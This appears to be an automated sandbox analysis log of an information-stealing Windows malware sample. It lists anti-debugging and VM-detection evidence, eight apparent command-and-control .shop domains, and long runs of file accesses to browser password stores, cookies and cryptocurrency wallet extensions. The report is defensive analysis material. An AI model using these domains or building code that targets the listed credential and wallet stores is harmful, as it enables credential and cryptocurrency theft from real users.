        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
        Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
        Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
        Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
        Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
        Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-27118
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00442080 LdrInitializeThunk,2_2_00442080
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]0_2_0042FE5F
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_020C0083 push dword ptr fs:[00000030h]0_2_020C0083
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_021300C6 mov eax, dword ptr fs:[00000030h]0_2_021300C6
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0210092B mov eax, dword ptr fs:[00000030h]0_2_0210092B
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_02100D90 mov eax, dword ptr fs:[00000030h]0_2_02100D90
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020A0083 push dword ptr fs:[00000030h]2_2_020A0083
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020D092B mov eax, dword ptr fs:[00000030h]2_2_020D092B
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020D0D90 mov eax, dword ptr fs:[00000030h]2_2_020D0D90
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0043BBC1 GetProcessHeap,0_2_0043BBC1
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104D3
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_00410666 SetUnhandledExceptionFilter,0_2_00410666
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F911
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0212A63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0212A63A
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0211073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0211073A
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0210FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0210FB78
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_021108CD SetUnhandledExceptionFilter,0_2_021108CD

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: 1831.tmp.exeString found in binary or memory: cloudewahsj.shop
        Source: 1831.tmp.exeString found in binary or memory: rabidcowse.shop
        Source: 1831.tmp.exeString found in binary or memory: noisycuttej.shop
        Source: 1831.tmp.exeString found in binary or memory: tirepublicerj.shop
        Source: 1831.tmp.exeString found in binary or memory: framekgirus.shop
        Source: 1831.tmp.exeString found in binary or memory: wholersorie.shop
        Source: 1831.tmp.exeString found in binary or memory: abruptyopsn.shop
        Source: 1831.tmp.exeString found in binary or memory: nearycrepso.shop
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeProcess created: C:\Users\user\AppData\Local\Temp\1831.tmp.exe "C:\Users\user\AppData\Local\Temp\1831.tmp.exe" Jump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0041077B cpuid 0_2_0041077B
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B00A
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: GetLocaleInfoW,0_2_004351C0
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: EnumSystemLocalesW,0_2_0043B2CD
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: EnumSystemLocalesW,0_2_0043B282
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: EnumSystemLocalesW,0_2_0043B368
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B3F5
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: GetLocaleInfoW,0_2_0043B645
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B76E
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: GetLocaleInfoW,0_2_0043B875
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B942
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: EnumSystemLocalesW,0_2_00434DCD
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0213B271
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: EnumSystemLocalesW,0_2_02135034
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: GetLocaleInfoW,0_2_02135427
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: EnumSystemLocalesW,0_2_0213B4E9
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: EnumSystemLocalesW,0_2_0213B534
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: EnumSystemLocalesW,0_2_0213B5CF
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: GetLocaleInfoW,0_2_0213BADC
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0213BBA9
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: GetLocaleInfoW,0_2_0213B8A3
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: GetLocaleInfoW,0_2_0213B8AC
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0213B9D5
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103CD
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163EA
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
        Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: Process Memory Space: 1831.tmp.exe PID: 6556, type: MEMORYSTR
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: 1831.tmp.exe, 00000002.00000002.2277491965.00000000004B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
        Source: 1831.tmp.exe, 00000002.00000002.2277491965.00000000004B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
        Source: 1831.tmp.exe, 00000002.00000002.2277491965.0000000000512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","ez":"BitApp"}
        Source: 1831.tmp.exe, 00000002.00000002.2277491965.00000000004B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
        Source: 1831.tmp.exe, 00000002.00000002.2277491965.0000000000512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletfontqE
        Source: 1831.tmp.exe, 00000002.00000002.2277491965.0000000000512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
        Source: 1831.tmp.exe, 00000002.00000002.2277491965.00000000004B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
        Source: 1831.tmp.exe, 00000002.00000002.2277491965.0000000000495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
        Source: 1831.tmp.exe, 00000002.00000002.2277491965.0000000000512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
